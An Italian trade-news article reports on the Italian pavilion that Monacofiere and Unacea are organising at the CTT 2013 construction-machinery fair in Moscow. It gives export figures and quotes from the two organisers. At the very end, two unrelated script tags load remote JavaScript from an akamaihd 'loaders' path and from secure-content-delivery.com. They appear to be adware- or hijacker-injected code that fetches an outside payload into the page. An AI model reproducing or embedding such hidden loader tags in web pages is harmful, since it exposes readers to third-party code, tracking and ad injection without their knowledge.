1. Home
  2. Notizie e Mercato
  3. Monacofiere e Unacea organizzano il padiglione italiano a Mosca

Monacofiere e Unacea organizzano il padiglione italiano a Mosca

Macchine per costruzioni di
5/5
votato da 1 persone
Le macchine per costruzioni italiane giocano la carta della Russia: la fiera annuale di macchine e tecnologie per le costruzioni si terrà a Mosca fino all’8 giugno


Inizia domani Ctt 2013, la fiera annuale di macchine e tecnologie per le costruzioni che si svolgerà a Mosca fino all’8 giugno. Dopo la positiva esperienza dello scorso anno, Monacofiere e Unacea ripropongono il padiglione espositivo italiano che quest'anno ospiterà circa 30 aziende. Il mercato russo continua a rappresentare uno sbocco fondamentale per le macchine per costruzioni italiane con un’incidenza sul totale dell’export pari all’8% nel primo bimestre del 2013, per un valore di €19 milioni.

Risultati particolarmente positivi per l’export di gru a torre, cresciuto del 145% rispetto al primo bimestre 2012, per le macchine per la preparazione degli inerti (+115%) e per i macchinari per il calcestruzzo (+22%). Ctt, giunta alla sua tredicesima edizione, è la fiera di settore più importante della Federazione russa. Per questa edizione è prevista un’area espositiva di quasi 122 mila metri quadrati con la partecipazione di 1.038 espositori provenienti da 30 paesi diversi.

Anche alla luce degli utlimi risultati negativi del mercato italiano – sostiene Michele Vitulano, consigliere di Unacea con delega all'internazionalizzazione – la valorizzazione del made in Italy nel mondo è un elemento chiave per l'industria nazionale delle macchine per costruzioni. Il mercato della Federazione russa ha delle grandi potenzialità di crescita che dobbiamo intercettare con la nostra offerta di prodotto”.

Si rafforza il nostro impegno nella promozione delle pmi italiane nel mondo che, grazie alla formula del padiglione nazionale organizzato insieme a Unacea, consente ai marchi italiani di presentarsi con un’immagine ben contraddistinta facendosi conoscere e apprezzare sui mercati in crescita” – è quanto dichiara Davide Galli, amministratore delegato di Monacofiere, il rappresentante italiano del gruppo Messe Munchen international.

Nell’ambito della collaborazione tra Monacofiere e Unacea per il 2013, previsto un ulteriore appuntamento a Johannesburg per Bauma Africa, dal 18 al 21 settembre.


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>